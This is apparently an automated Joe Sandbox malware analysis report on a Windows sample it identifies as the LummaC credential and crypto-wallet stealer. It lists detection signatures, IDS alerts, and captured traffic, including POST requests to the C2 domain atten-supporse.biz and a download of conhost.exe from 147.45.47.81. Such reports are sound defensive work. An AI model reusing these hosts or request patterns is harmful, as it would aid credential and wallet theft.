Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
fkydjyhjadg.exe

Overview

General Information

Sample name:fkydjyhjadg.exe
Analysis ID:1565835
MD5:b2c8bf8a5797d9ee73c205e27cfdbbfb
SHA1:da8b2fa38e7c0fef5d13cef94f0028b75e05e8ab
SHA256:784bcd0555e5e1ab25b212f28bd84b64eac99270afb0a73fb4cd92fb737d6c7f
Tags:exeuser-aachum
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
PE file has nameless sections
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • fkydjyhjadg.exe (PID: 7644 cmdline: "C:\Users\user\Desktop\fkydjyhjadg.exe" MD5: B2C8BF8A5797D9EE73C205E27CFDBBFB)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000003.1533725414.0000000000A0C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.1533589434.0000000000A09000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: fkydjyhjadg.exe PID: 7644JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: fkydjyhjadg.exe PID: 7644JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-30T22:30:25.324602+010020283713Unknown Traffic192.168.2.849706172.67.165.166443TCP
              2024-11-30T22:30:28.409310+010020283713Unknown Traffic192.168.2.849707172.67.165.166443TCP
              2024-11-30T22:30:31.200859+010020283713Unknown Traffic192.168.2.849708172.67.165.166443TCP
              2024-11-30T22:30:33.849234+010020283713Unknown Traffic192.168.2.849709172.67.165.166443TCP
              2024-11-30T22:30:36.656991+010020283713Unknown Traffic192.168.2.849710172.67.165.166443TCP
              2024-11-30T22:30:40.015292+010020283713Unknown Traffic192.168.2.849711172.67.165.166443TCP
              2024-11-30T22:30:43.202591+010020283713Unknown Traffic192.168.2.849714172.67.165.166443TCP
              2024-11-30T22:30:47.705064+010020283713Unknown Traffic192.168.2.849715172.67.165.166443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-30T22:30:27.042968+010020546531A Network Trojan was detected192.168.2.849706172.67.165.166443TCP
              2024-11-30T22:30:29.523262+010020546531A Network Trojan was detected192.168.2.849707172.67.165.166443TCP
              2024-11-30T22:30:48.487809+010020546531A Network Trojan was detected192.168.2.849715172.67.165.166443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-30T22:30:27.042968+010020498361A Network Trojan was detected192.168.2.849706172.67.165.166443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-30T22:30:29.523262+010020498121A Network Trojan was detected192.168.2.849707172.67.165.166443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-30T22:30:40.876959+010020480941Malware Command and Control Activity Detected192.168.2.849711172.67.165.166443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: fkydjyhjadg.exeAvira: detected
              Source: fkydjyhjadg.exeReversingLabs: Detection: 47%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: fkydjyhjadg.exeJoe Sandbox ML: detected
              Source: fkydjyhjadg.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.8:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.8:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.8:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.8:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.8:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.8:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.8:49714 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.8:49715 version: TLS 1.2

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49706 -> 172.67.165.166:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49706 -> 172.67.165.166:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49715 -> 172.67.165.166:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49707 -> 172.67.165.166:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49707 -> 172.67.165.166:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49711 -> 172.67.165.166:443
              Source: Joe Sandbox ViewIP Address: 147.45.47.81 147.45.47.81
              Source: Joe Sandbox ViewIP Address: 172.67.165.166 172.67.165.166
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 172.67.165.166:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 172.67.165.166:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49708 -> 172.67.165.166:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49709 -> 172.67.165.166:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49711 -> 172.67.165.166:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49714 -> 172.67.165.166:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49710 -> 172.67.165.166:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49715 -> 172.67.165.166:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: atten-supporse.biz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: atten-supporse.biz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=D8IQA5B28O6DU5J3CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12842Host: atten-supporse.biz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6YKN7TOC71User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15029Host: atten-supporse.biz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=URSDWKJYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20184Host: atten-supporse.biz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=VNMP0L5TT4ELFIIO3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1224Host: atten-supporse.biz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ZS7WCONQ6BCRKM9SKA3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 587900Host: atten-supporse.biz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 84Host: atten-supporse.biz
              Source: global trafficHTTP traffic detected: GET /conhost.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 147.45.47.81
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.81
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /conhost.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 147.45.47.81
              Source: global trafficDNS traffic detected: DNS query: atten-supporse.biz
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: atten-supporse.biz
              Source: fkydjyhjadg.exe, 00000000.00000002.2018255121.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1685321017.00000000009B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/
              Source: fkydjyhjadg.exe, 00000000.00000002.2018255121.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1685321017.00000000009B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/1
              Source: fkydjyhjadg.exe, 00000000.00000002.2018255121.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1685321017.00000000009B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/8
              Source: fkydjyhjadg.exe, 00000000.00000002.2018533373.0000000000A01000.00000004.00000020.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000002.2018255121.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1685171231.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1685321017.00000000009B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/conhost.exe
              Source: fkydjyhjadg.exe, 00000000.00000002.2018255121.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1685321017.00000000009B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81/oded
              Source: fkydjyhjadg.exe, 00000000.00000003.1685321017.00000000009B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.81:80/conhost.exe
              Source: fkydjyhjadg.exe, 00000000.00000003.1499098189.00000000039AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: fkydjyhjadg.exe, 00000000.00000003.1499098189.00000000039AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: fkydjyhjadg.exe, 00000000.00000003.1566111992.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000002.2018483183.00000000009F0000.00000004.00000020.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1685286401.00000000009EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
              Source: fkydjyhjadg.exe, 00000000.00000003.1499098189.00000000039AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: fkydjyhjadg.exe, 00000000.00000003.1499098189.00000000039AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: fkydjyhjadg.exe, 00000000.00000003.1499098189.00000000039AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: fkydjyhjadg.exe, 00000000.00000003.1499098189.00000000039AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: fkydjyhjadg.exe, 00000000.00000003.1499098189.00000000039AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: fkydjyhjadg.exe, 00000000.00000003.1499098189.00000000039AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: fkydjyhjadg.exe, 00000000.00000003.1499098189.00000000039AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: fkydjyhjadg.exe, 00000000.00000002.2017786925.0000000000124000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.enigmaprotector.com/
              Source: fkydjyhjadg.exe, 00000000.00000002.2017786925.0000000000124000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.enigmaprotector.com/openU
              Source: fkydjyhjadg.exe, 00000000.00000003.1499098189.00000000039AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: fkydjyhjadg.exe, 00000000.00000003.1499098189.00000000039AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: fkydjyhjadg.exe, 00000000.00000003.1444758788.00000000038D9000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1444647768.00000000038DC000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1444697967.00000000038D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: fkydjyhjadg.exe, 00000000.00000003.1561157838.0000000003932000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1534098413.0000000003933000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1566057032.000000000392F000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1530072898.0000000003932000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1530971997.0000000003932000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1496162984.0000000003926000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000002.2018255121.000000000096B000.00000004.00000020.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1495548222.000000000391F000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1566111992.00000000009F8000.00000004.00000020.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1494700759.000000000391C000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1501024723.0000000003928000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1566092238.0000000003930000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1533610600.0000000003932000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1579126128.000000000391D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/
              Source: fkydjyhjadg.exe, 00000000.00000002.2019407520.0000000003933000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1685192530.0000000003932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/26
              Source: fkydjyhjadg.exe, 00000000.00000003.1444316793.00000000009FA000.00000004.00000020.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000002.2018255121.000000000093E000.00000004.00000020.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1579126128.0000000003928000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1685146502.0000000003928000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000002.2018255121.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1685321017.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000002.2019407520.0000000003928000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/api
              Source: fkydjyhjadg.exe, 00000000.00000003.1579126128.0000000003928000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1566007178.0000000003928000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1557298842.0000000003928000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1685146502.0000000003928000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1530072898.0000000003928000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000002.2019407520.0000000003928000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/api3p6Aya
              Source: fkydjyhjadg.exe, 00000000.00000002.2018255121.000000000093E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/api:S
              Source: fkydjyhjadg.exe, 00000000.00000003.1579126128.0000000003928000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1566007178.0000000003928000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1557298842.0000000003928000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1685146502.0000000003928000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000002.2019407520.0000000003928000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/apiwli8pw
              Source: fkydjyhjadg.exe, 00000000.00000003.1566111992.00000000009F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/q
              Source: fkydjyhjadg.exe, 00000000.00000003.1501350185.0000000003931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
              Source: fkydjyhjadg.exe, 00000000.00000003.1501350185.0000000003931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
              Source: fkydjyhjadg.exe, 00000000.00000003.1444758788.00000000038D9000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1444647768.00000000038DC000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1444697967.00000000038D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: fkydjyhjadg.exe, 00000000.00000003.1444758788.00000000038D9000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1444647768.00000000038DC000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1444697967.00000000038D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: fkydjyhjadg.exe, 00000000.00000003.1444758788.00000000038D9000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1444647768.00000000038DC000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1444697967.00000000038D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: fkydjyhjadg.exe, 00000000.00000003.1501350185.0000000003931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
              Source: fkydjyhjadg.exe, 00000000.00000003.1501350185.0000000003931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: fkydjyhjadg.exe, 00000000.00000003.1444758788.00000000038D9000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1444647768.00000000038DC000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1444697967.00000000038D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: fkydjyhjadg.exe, 00000000.00000003.1444758788.00000000038D9000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1444647768.00000000038DC000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1444697967.00000000038D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: fkydjyhjadg.exe, 00000000.00000003.1444758788.00000000038D9000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1444647768.00000000038DC000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1444697967.00000000038D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: fkydjyhjadg.exe, 00000000.00000003.1501350185.0000000003931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
              Source: fkydjyhjadg.exe, 00000000.00000003.1501043188.0000000003BC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: fkydjyhjadg.exe, 00000000.00000003.1501043188.0000000003BC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: fkydjyhjadg.exe, 00000000.00000003.1501350185.0000000003931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
              Source: fkydjyhjadg.exe, 00000000.00000003.1444758788.00000000038D9000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1444647768.00000000038DC000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1444697967.00000000038D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: fkydjyhjadg.exe, 00000000.00000003.1444758788.00000000038D9000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1444647768.00000000038DC000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1444697967.00000000038D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: fkydjyhjadg.exe, 00000000.00000003.1501350185.0000000003931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
              Source: fkydjyhjadg.exe, 00000000.00000003.1500937476.00000000039AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: fkydjyhjadg.exe, 00000000.00000003.1501043188.0000000003BC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
              Source: fkydjyhjadg.exe, 00000000.00000003.1501043188.0000000003BC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
              Source: fkydjyhjadg.exe, 00000000.00000003.1501043188.0000000003BC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: fkydjyhjadg.exe, 00000000.00000003.1501043188.0000000003BC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.8:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.8:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.8:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.8:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.8:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.8:49711 version: TLS 1.2
